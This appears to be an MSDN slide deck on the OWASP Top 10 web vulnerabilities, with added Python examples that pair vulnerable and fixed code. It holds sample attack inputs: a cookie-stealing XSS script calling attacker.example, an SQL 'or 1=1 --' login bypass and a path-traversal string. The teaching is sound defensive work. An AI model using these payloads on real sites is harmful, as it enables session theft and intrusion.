It’s always better live.
MSDN Events
Securing Web Applications
Part 1 of 2
Understanding Threats and Attacks
Challenges When Implementing Security
Attacker needs to understand only one security issue
Defender needs to secure all entry points
Attacker has unlimited time
Defender works with time and cost constraints
Attackers vs. Defenders
Developers and management think that security does not add any business value
Addressing security issues just before a product is released is very expensive
Security As an Afterthought
Secure systems are more difficult to use
Complex and strong passwords are difficult to remember
Users prefer simple passwords
Security vs. Usability
Agenda
A Closer look at Top Web Vulnerabilities:
Cross Site Scripting
Injection Flaws
Malicious File Execution
Insecure Direct Object Reference
Cross Site Request Forgery (CSRF)
Information Leakage and Improper Error Handling
Broken Authentication and Session Management
Insecure Cryptography
Insecure Communications
Failure to Restrict URL Access
Open Web Application Security Project (OWASP)
http://www.owasp.org/index.php/Top_10_2007
Cross Site Scripting (XSS)
What is Cross Site Scripting
Exploits applications that echo raw, unfiltered input to Web pages
Malicious code is echoed back into the HTML
Find a <form> field or query string parameter whose value is echoed to the Web page, put in malicious script and get a user to navigate to the page
Allows attackers to execute scripts
Can hijack user sessions
Deface web sites or insert hostile content
Conduct Phishing attacks
Take over the user’s browsers
Cross Site Scripting (XSS)
Three known types of cross site scripting
Reflected
Stored
DOM Injection
Cross Site Scripting (XSS)
Reflected
A page reflects user supplied data directly back to the user, typically in a search result or error message
Occurs when a site does not encode or filter content before displaying it
The payload is delivered in a link or form the victim submits; because the script runs in the site's own origin it can read session cookies and other authentication details and send them to the attacker
Cross Site Scripting (XSS)
Stored / Sticky XSS
Stores hostile / non-approved data in a file or a database
Sometimes assumed that stored data is
inherently safe
Internal attacks often exploit this assumption
Dangerous to Systems such as:
Content Management Systems
Blogs or forums
Sites that allow users to see input by other users
Cross Site Scripting (XSS)
DOM based attacks
Legitimate JavaScript on the page writes attacker-controlled data (for example from the URL or its fragment) into the document
Attacks can be a blend of various techniques
Generally carried out using JavaScript; the payload may never be sent to the server, so server-side filtering does not see it
Allows attackers to manipulate the rendered page by modifying the DOM tree
Can allow form data hijacking
Can occur without user interaction and without any visible change to the page
Can use the XmlHttpRequest object (AJAX) to send captured data to the attacker
Can compromise checkout information
Cross Site Scripting (XSS)
Cross Site Scripting Demo
Discovery using Reflected Method
Using Stored or Sticky Method
Non-Persistent Attack via Email
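The reflected and attribute-context cases from the slides above, as an added example (not code from the original deck): the vulnerable echo beside its encoded form, plus the crude "did my payload come back unencoded" check used during discovery. The payload strings, page fragments and the attacker.example host are constructed for this example.

```python
import html

# Constructed sample payload: a reflected script that exfiltrates the session cookie.
PAYLOAD = '<script>document.location="http://attacker.example/?c="+document.cookie</script>'
# Constructed attribute-context payload: closes the value attribute and adds an event handler.
ATTR_PAYLOAD = '" onfocus="alert(1)" autofocus="'


def render_search_unsafe(query: str) -> str:
    """Echoes the raw parameter into the HTML body: reflected XSS."""
    return f"<p>Results for: {query}</p>"


def render_search_safe(query: str) -> str:
    """HTML-encodes the parameter for the body context before echoing it."""
    return f"<p>Results for: {html.escape(query)}</p>"


def render_attr_unsafe(query: str) -> str:
    """Echoes the value inside a quoted attribute; a stray quote breaks out of it."""
    return f'<input name="q" value="{query}">'


def render_attr_safe(query: str) -> str:
    """quote=True also encodes double and single quotes, so the attribute cannot be closed early."""
    return f'<input name="q" value="{html.escape(query, quote=True)}">'


def is_reflected_raw(page: str, payload: str) -> bool:
    """Discovery check from the demo: did the payload come back byte-for-byte?"""
    return payload in page


if __name__ == "__main__":
    for render in (render_search_unsafe, render_search_safe):
        page = render(PAYLOAD)
        print(render.__name__, "reflected raw:", is_reflected_raw(page, PAYLOAD))
    print(render_attr_unsafe(ATTR_PAYLOAD))
    print(render_attr_safe(ATTR_PAYLOAD))
```

Encoding is context specific: body text, attribute values, JavaScript strings and URLs each need their own encoder. Note that the DOM-based variant never reaches the server, so this server-side encoding does nothing for it; client code must write untrusted data with textContent rather than innerHTML.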
Cross Site Request Forgery
Simple and Potentially Devastating
Forces a logged-on victim's browser to send a request to a vulnerable web application, which then performs an action on behalf of the victim
Occurs when authorization is performed solely on credentials the browser submits automatically, such as:
Session cookies
Basic authentication credentials
Source IP addresses
SSL client certificates
Windows domain credentials
Cross Site Request Forgery
Cross Site Request Forgery Demo
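The forged transfer from the demo, as an added example (not the deck's own code): a handler that authorizes on the automatically submitted session cookie alone beside one that also demands a synchronizer token bound to the session. The session store, the balance, the CSRF key and the attacker's form are constructed for this example.

```python
import hashlib
import hmac
import secrets

# Constructed session store: cookie value -> server-side session data.
SESSIONS = {}
# Server-side secret used to derive per-session CSRF tokens (assumption for this example).
CSRF_KEY = secrets.token_bytes(32)


def login(username: str) -> str:
    """Creates a session and returns the cookie value the browser will auto-submit."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": username, "balance": 1000}
    return sid


def csrf_token(sid: str) -> str:
    """Synchronizer token: derived from the session, embedded in same-origin forms only."""
    return hmac.new(CSRF_KEY, sid.encode(), hashlib.sha256).hexdigest()


def transfer_vulnerable(cookie: str, form: dict) -> str:
    """Authorizes solely on the automatically submitted session cookie."""
    session = SESSIONS.get(cookie)
    if session is None:
        return "401 not logged in"
    session["balance"] -= int(form["amount"])
    return "200 transferred"


def transfer_protected(cookie: str, form: dict) -> str:
    """Requires a token a cross-site page cannot read, compared in constant time."""
    session = SESSIONS.get(cookie)
    if session is None:
        return "401 not logged in"
    supplied = form.get("csrf_token", "")
    if not hmac.compare_digest(supplied, csrf_token(cookie)):
        return "403 missing or invalid CSRF token"
    session["balance"] -= int(form["amount"])
    return "200 transferred"


def forged_request(cookie: str):
    """What an auto-submitting form on attacker.example produces: the victim's cookie
    rides along because the browser attaches it, but no token is present."""
    return cookie, {"to": "attacker", "amount": "500"}


if __name__ == "__main__":
    sid = login("victim")
    cookie, form = forged_request(sid)
    print("vulnerable:", transfer_vulnerable(cookie, form), SESSIONS[sid])
    print("protected:", transfer_protected(cookie, form), SESSIONS[sid])
```

Because the token is derived from the session id it must only ever travel in the request body, never in a URL that can leak through Referer headers or logs.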
Injection Flaws
SQL injection flaws are common vulnerabilities
Occurs when external input is used in database commands
The supplied data changes the command being executed
Can allow attackers to create, read, update or delete data
Can potentially compromise an entire application
Injection Flaws
Example exploit:
SELECT COUNT(*)
FROM Users
WHERE User = 'User' AND Password = 'Password'
The query relies on user submitted information to perform the query
Malicious input can be submitted instead, such as ' or 1=1 --
' closes the preceding string in the SQL statement
or 1=1 matches every record in the table
-- comments out the remainder of the SQL statement, including the password check
Injection Flaws
SQL Injection Flaw Demos
Adding an Admin Account
Compromising Database Table Structure and Data
Defacing a Website
Injection Flaws
Not limited to SQL injection only
LDAP, XPath, XXI, MX (mail) injection
HTML injection (XSS)
HTTP injection (HTTP response splitting)
Malicious File Execution
Occurs when the application is tricked into executing commands or creating files on the server
The system allows potentially hostile input to be used with file or stream functions, such as URLs or file system references
Can lead to arbitrary remote and hostile content being included or invoked by the server
Allows for remote code execution
Remote root installations or complete system compromise
Insecure Direct Object Reference
Occurs when an internal implementation object is exposed, such as a:
File
Directory
Database record or key
URL
Form parameter
These can be manipulated if no access control check is in place
Insecure Direct Object Reference
Applications expose internal objects to users
Parameter tampering allows the references to be changed
Can violate the intended but unenforced access control policy
Any exposed application construct could be vulnerable
Code can be attacked when user input determines the location of the object
Input parameters containing sequences such as ../../../ can allow an attacker to traverse the file system
Insecure Direct Object Reference
Demo
Accessing Source Code
Accessing Sensitive Information
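Added example (not from the deck) covering both the file-function case from Malicious File Execution and the record and path-traversal cases from Insecure Direct Object Reference: a containment check for a user-supplied path, an unchecked record lookup beside an owner-checked one, and a per-session indirect reference map. The document root, record table and owners are constructed assumptions.

```python
import posixpath
import secrets

# Assumed document root for user-uploaded files in this example.
FILE_ROOT = "/srv/app/userfiles"

# Constructed records: the database key is exposed as ?id=101 in the vulnerable version.
RECORDS = {
    101: {"owner": "alice", "ssn": "123-45-6789"},
    102: {"owner": "bob", "ssn": "987-65-4321"},
}


def resolve_under_root(root: str, user_path: str):
    """Returns the normalised path if it stays under root, otherwise None.

    Pure string check (posixpath), so it runs without touching the file system;
    on a real server also compare os.path.realpath() results so symlinks cannot
    escape the root, and URL-decode the parameter before calling this.
    """
    if "\x00" in user_path:
        return None  # a NUL byte would truncate the path in C-based file APIs
    root = posixpath.normpath(root)
    # join() discards root if user_path is absolute; normpath collapses ../ segments
    candidate = posixpath.normpath(posixpath.join(root, user_path))
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None


def get_record_vulnerable(record_id: int):
    """Direct object reference with no access control check."""
    return RECORDS.get(record_id)


def get_record_checked(current_user: str, record_id: int):
    """Same lookup, but the authenticated caller must own the record."""
    record = RECORDS.get(record_id)
    if record is None or record["owner"] != current_user:
        return None
    return record


class ReferenceMap:
    """Per-session indirect references: the client sees random handles, never the key."""

    def __init__(self):
        self._handles = {}

    def expose(self, internal_id: int) -> str:
        handle = secrets.token_urlsafe(12)
        self._handles[handle] = internal_id
        return handle

    def resolve(self, handle: str):
        return self._handles.get(handle)


if __name__ == "__main__":
    for p in ("2024/q1.pdf", "../../../etc/passwd", "/etc/passwd"):
        print(p, "->", resolve_under_root(FILE_ROOT, p))
    print("alice reading 102 unchecked:", get_record_vulnerable(102))
    print("alice reading 102 checked:", get_record_checked("alice", 102))
```

The indirect map stops guessing, but the owner check is the actual control: even a correctly mapped handle must still be authorized for the calling user.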
Information Leakage and Improper Error Handling
Applications can unintentionally leak information about their configuration or internal workings
They can leak state information
Improper error handling exposes internal workings and implementation details:
Stack traces
Failed SQL statements
Other debugging information
This information can help an attacker successfully exploit other vulnerabilities
This is an extremely common error and occurs if the web.config file is not properly configured (for example, detailed error pages left enabled for remote users)
Information Leakage and Improper Error Handling Demo
Too Much Info on Login Attempts
Too Much Error Information
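Both demo items above as an added example (not the deck's code): a login that reveals which half of the credential was wrong beside one that does not, and a request wrapper that keeps the stack trace and failed SQL statement in the server log while the user sees only a correlation id. The user table, the log list and the failing handler are constructed for this example.

```python
import hmac
import traceback
import uuid

SERVER_LOG = []  # constructed stand-in for the server-side application log

USERS = {"alice": "s3cret"}  # constructed; real systems store password hashes, not passwords


def login_leaky(user: str, password: str) -> str:
    """Tells the attacker which half of the credential was wrong (username enumeration)."""
    if user not in USERS:
        return "No such user"
    if USERS[user] != password:
        return f"Wrong password for {user}"
    return "OK"


def login_uniform(user: str, password: str) -> str:
    """One message for every failure, compared in constant time."""
    stored = USERS.get(user, "")
    if not hmac.compare_digest(stored.encode(), password.encode()):
        return "Invalid username or password"
    return "OK"


def handle_request(handler, *args):
    """Catches anything the handler raises, keeps the details server-side and
    returns a generic page carrying only a correlation id."""
    try:
        return 200, handler(*args)
    except Exception:
        ref = uuid.uuid4().hex[:12]
        SERVER_LOG.append(f"[{ref}] {traceback.format_exc()}")
        return 500, f"An error occurred. Reference: {ref}"


def report_handler(report_id: str) -> str:
    """Constructed handler that fails the way a broken data-access layer would,
    with the failed SQL statement and server name in the exception text."""
    if report_id != "42":
        raise LookupError(
            f"SELECT * FROM Reports WHERE Id = {report_id} returned no rows (db: prod-sql-01)")
    return "report 42"


if __name__ == "__main__":
    print(login_leaky("carol", "x"), "/", login_leaky("alice", "x"))
    print(login_uniform("carol", "x"), "/", login_uniform("alice", "x"))
    print(handle_request(report_handler, "7"))
    print(SERVER_LOG[-1])
```

The correlation id is what support staff use to find the full trace in the log; nothing about the database, query or stack reaches the browser.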
Broken Authentication and Session Management
Improper authentication and session management
Use of predictable (weak pseudo-random) session values
Failing to protect credentials and session tokens after login
Can lead to hijacking of user or admin accounts
Undermines authorization and accountability controls
Can cause privacy violations
Broken Authentication and Session Management
Generally the ancillary functions cause problems, such as:
Logout
Password Management
Timeout
Remember me
Secret question
Account update
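Added example (not from the deck) for the session points above: a predictable session id of the kind the slide warns about beside a store that issues ids from the OS random source, rotates the id at login, expires idle sessions and invalidates on logout. The timeout value and the injectable clock are assumptions made so the timeout can be exercised offline.

```python
import secrets
import time

IDLE_TIMEOUT = 15 * 60  # seconds of inactivity before a session dies; assumed policy value


def weak_session_id(login_counter: int, now: float) -> str:
    """The kind of 'pseudo random' value the slide warns about: timestamp plus a counter,
    so an attacker who logs in once can guess the ids issued around the same time."""
    return f"{int(now)}{login_counter:04d}"


class SessionStore:
    """Server-side sessions with unguessable ids, rotation at login, idle timeout and logout."""

    def __init__(self, clock=time.time):
        self._sessions = {}
        self._clock = clock  # injectable so the timeout can be tested deterministically

    def create_anonymous(self) -> str:
        sid = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
        self._sessions[sid] = {"user": None, "last": self._clock()}
        return sid

    def login(self, sid: str, user: str) -> str:
        """Issues a fresh id on authentication so a pre-set (fixated) id is worthless."""
        self._sessions.pop(sid, None)
        new_sid = secrets.token_urlsafe(32)
        self._sessions[new_sid] = {"user": user, "last": self._clock()}
        return new_sid

    def user_for(self, sid: str):
        """Resolves a cookie to a user, expiring idle sessions on the way."""
        session = self._sessions.get(sid)
        if session is None:
            return None
        now = self._clock()
        if now - session["last"] > IDLE_TIMEOUT:
            del self._sessions[sid]
            return None
        session["last"] = now
        return session["user"]

    def logout(self, sid: str) -> None:
        """Invalidates server-side; clearing the cookie alone leaves the session usable."""
        self._sessions.pop(sid, None)


if __name__ == "__main__":
    print("weak ids:", weak_session_id(1, time.time()), weak_session_id(2, time.time()))
    store = SessionStore()
    sid = store.login(store.create_anonymous(), "alice")
    print("strong id:", sid, "->", store.user_for(sid))
    store.logout(sid)
    print("after logout:", store.user_for(sid))
```

The same rotate-on-login rule applies to the "remember me" and password-change paths: any event that raises the privilege of a session should replace its identifier.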
Broken Authentication and Session Management
Broken Authentication and Session Management Demo
Displaying Others' Profile Information
Insecure Cryptographic Storage
Correct use of data encryption tools is key to protection
Flaws can lead to disclosure of sensitive data and compliance violations
Some of the most common flaws include:
Not encrypting sensitive data
Insecure use of strong algorithms
Usage of weak / homegrown algorithms, a.k.a. "encraption"
Hard coding keys or not protecting them
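Two of the flaws listed above, as an added example (not the deck's code): an unsalted fast hash for password storage beside a salted, iterated PBKDF2 record, and a key loader that refuses to fall back to a literal in source. The record format, the environment variable name and the iteration count are assumptions; the iteration count in production should be tuned to the hardware.

```python
import hashlib
import hmac
import os
import secrets


def legacy_hash(password: str) -> str:
    """Unsalted fast hash: equal passwords give equal hashes and rainbow tables apply."""
    return hashlib.md5(password.encode()).hexdigest()


def hash_password(password: str, iterations: int = 600_000) -> str:
    """Salted, iterated PBKDF2-HMAC-SHA256; the record carries everything needed to verify."""
    salt = secrets.token_bytes(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recomputes with the stored salt and iteration count; constant-time compare."""
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


def load_key(env=os.environ, name: str = "APP_ENC_KEY") -> bytes:
    """Keys come from the environment or a secret store, never from a literal in source."""
    value = env.get(name)
    if value is None:
        raise RuntimeError(f"{name} not set; refusing to fall back to a built-in key")
    key = bytes.fromhex(value)
    if len(key) < 32:
        raise RuntimeError("key too short")
    return key


if __name__ == "__main__":
    print("legacy, same for every user:", legacy_hash("hunter2"))
    record = hash_password("hunter2")
    print("pbkdf2 record:", record)
    print("verify correct:", verify_password("hunter2", record))
    print("verify wrong:", verify_password("hunter3", record))
```

Storing the algorithm and iteration count in the record is what lets you raise the work factor later and re-hash users transparently at their next login.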
Insecure Communications
Unencrypted traffic can be sniffed
Anyone on the network path can read the whole conversation
Potentially exposes sensitive information or credentials
Can expose the authentication or session token, which is as good as the password for the life of the session
Traffic sniffers can capture credentials or sensitive information; how easy this is varies by network (shared wireless and hubbed segments are the worst case)
A common failure is using SSL only for the login page instead of for every authenticated request
Failure to Restrict URL Access
Generally URL protection is based on authentication
Pages can still be accessed if not secured properly
Security by obscurity is not sufficient
Hidden URLs that are only meant for certain users can be stumbled upon or discovered
Privilege checks performed on the client side (hidden links, hidden form fields) are not access control
Failure to Restrict URL Access
Demo
Security by Obscurity
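The demo's point as an added example (not from the deck): a dispatcher that only checks that the caller is logged in and relies on admin links being hidden, one that trusts a role claimed in a hidden form field, and one that checks the server-side role on every request. The route table, roles and session cookies are constructed for this example.

```python
# Constructed route table: the role each URL requires (None = public).
ROUTES = {
    "/": None,
    "/account": "user",
    "/admin/users": "admin",
    "/admin/export-q3-report": "admin",  # "hidden" link, only rendered for admins
}
RANK = {None: 0, "user": 1, "admin": 2}

# Constructed sessions: cookie value -> authenticated identity and server-side role.
SESSIONS = {
    "cookie-alice": {"user": "alice", "role": "user"},
    "cookie-root": {"user": "root", "role": "admin"},
}


def navigation_links(role) -> list:
    """What the page renders; hiding a link is presentation, not access control."""
    return [path for path, need in ROUTES.items() if RANK[role] >= RANK[need]]


def _lookup(cookie: str, path: str):
    """Shared prelude: 404 for unknown paths, 200 for public ones, 401 if not logged in."""
    if path not in ROUTES:
        return 404, None
    if ROUTES[path] is None:
        return 200, None
    session = SESSIONS.get(cookie)
    if session is None:
        return 401, None
    return None, session


def dispatch_obscure(cookie: str, path: str) -> int:
    """Security by obscurity: any logged-in user who knows the URL gets the page."""
    status, _ = _lookup(cookie, path)
    return status if status is not None else 200


def dispatch_client_trust(cookie: str, path: str, form: dict) -> int:
    """Client-side privilege: the role comes from a hidden form field the user controls."""
    status, _ = _lookup(cookie, path)
    if status is not None:
        return status
    claimed = form.get("role", "user")
    return 200 if RANK.get(claimed, 0) >= RANK[ROUTES[path]] else 403


def dispatch_enforced(cookie: str, path: str) -> int:
    """Checks the server-side role on every request, whatever the page linked to."""
    status, session = _lookup(cookie, path)
    if status is not None:
        return status
    return 200 if RANK[session["role"]] >= RANK[ROUTES[path]] else 403


if __name__ == "__main__":
    hidden = "/admin/export-q3-report"
    print("links shown to alice:", navigation_links("user"))
    print("obscure:", dispatch_obscure("cookie-alice", hidden))
    print("client trust:", dispatch_client_trust("cookie-alice", hidden, {"role": "admin"}))
    print("enforced:", dispatch_enforced("cookie-alice", hidden))
```

Enforcement belongs in one central place (a filter or base handler) so that a page added later cannot be forgotten; pages that are not in the route table should be denied, not served.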